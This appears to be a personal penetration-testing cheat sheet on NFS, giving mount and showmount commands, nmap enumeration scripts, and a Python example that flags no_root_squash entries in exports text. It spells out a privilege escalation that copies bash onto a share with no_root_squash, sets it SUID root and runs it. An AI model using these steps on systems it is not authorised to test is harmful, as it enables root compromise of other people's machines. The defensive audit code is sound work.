Network File System (NFS)
Network File System (NFS) is a protocol allowing a computer to mount a remote folder on its local file system.
Port: 2049 (TCP)
NFS is built on RPC, which it uses for its exchanges. It uses External Data Representation (XDR) for data serialization.
List mounts
$ showmount -e IP
# see NFS exports
$ cat /etc/exports
Mount/Unmount
The command below will mount the remote folder /share inside /tmp/share on our machine. It means that when we browse /tmp/share, we will see the files inside /share on the remote host.
# sudo apt install nfs-common
$ mkdir /tmp/share
$ sudo mount -t nfs IP:/share /tmp/share/ # [-nolock]
# there are also variants (with/without vers=2):
# sudo mount -o rw,vers=2 IP:/share /tmp/share/
# unmount
$ sudo umount /tmp/share
NFS vulnerabilities
- It's possible to use nmap to get information about NFS shares:
$ nmap IP -p 2049 --script=nfs-ls,nfs-statfs,nfs-showmount
$ sudo nmap IP -p111,2049 -sV --script nfs*
$ sudo nmap IP -p111,2049 -sV -sC
- When root squashing is disabled (the no_root_squash export option), a local root user is mapped to the remote root user, allowing them to create root-owned SUID files on the share.
# on the remote host, we create a bash inside the share
$ cp /bin/bash /share/sbash
# on the local host
# we give the file root privileges
$ sudo chown root /tmp/share/sbash
$ sudo chmod +s /tmp/share/sbash
# then, on the remote host, running the SUID file
# will run it as root
$ /share/sbash -p
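To find this misconfiguration on a server you administer, the following added example (not part of the original notes) parses text in /etc/exports syntax and reports every export where root is not squashed. The sample entries are constructed, the function names are hypothetical, and it assumes per-client options are applied on top of any "-options" defaults given on the same line.

```python
# Added example: flag exports where root is not squashed (constructed sample data).
SAMPLE_EXPORTS = """\
# path      client(options)
/share      10.0.0.0/24(rw,sync,no_root_squash,no_subtree_check)
/srv/docs   *(ro,sync)
/srv/build  -rw,no_root_squash  ci01.example.test \\
            10.0.0.5(ro,root_squash)
/tmp/share  192.0.2.0/24(sync,no_subtree_check)
"""


def logical_lines(text):
    """Yield entries with comments removed and backslash continuations joined."""
    pending = ""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()
        if line.endswith("\\"):
            pending += line[:-1] + " "
            continue
        line, pending = (pending + line).strip(), ""
        if line:
            yield line


def last_wins(opts, on, off, default):
    """Resolve an on/off option pair; the last occurrence takes effect."""
    state = default
    for opt in opts:
        if opt in (on, off):
            state = opt == on
    return state


def unsquashed_root(text):
    """Return (path, client, writable) for every export that keeps root as root."""
    findings = []
    for line in logical_lines(text):
        path, *specs = line.split()
        defaults = []
        for spec in specs:
            if spec.startswith("-"):  # "-opt,opt": defaults for the rest of the line
                defaults = spec[1:].split(",")
                continue
            client, _, rest = spec.partition("(")
            opts = defaults + [o for o in rest.rstrip(")").split(",") if o]
            # Assumption: client options are applied on top of the line defaults.
            if last_wins(opts, "no_root_squash", "root_squash", False):
                writable = last_wins(opts, "rw", "ro", False)
                findings.append((path, client or "*", writable))
    return findings


if __name__ == "__main__":
    for path, client, writable in unsquashed_root(SAMPLE_EXPORTS):
        print(f"{path} -> {client}: no_root_squash ({'rw' if writable else 'ro'})")
```

Entries that omit both options are not reported, because root_squash is the default.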
To-do
Stuff that I found, but never read/used yet.
NFS
- nfs-utils (ubuntu), nfs-ganesha (solaris), openNFS (RedHat)
- nfsstat
- nfswatch
- DoS
- systemctl restart nfs-kernel-server ; exportfs
Add an export
- echo '/tmp/share CIDR(sync,no_subtree_check)' >> /etc/exports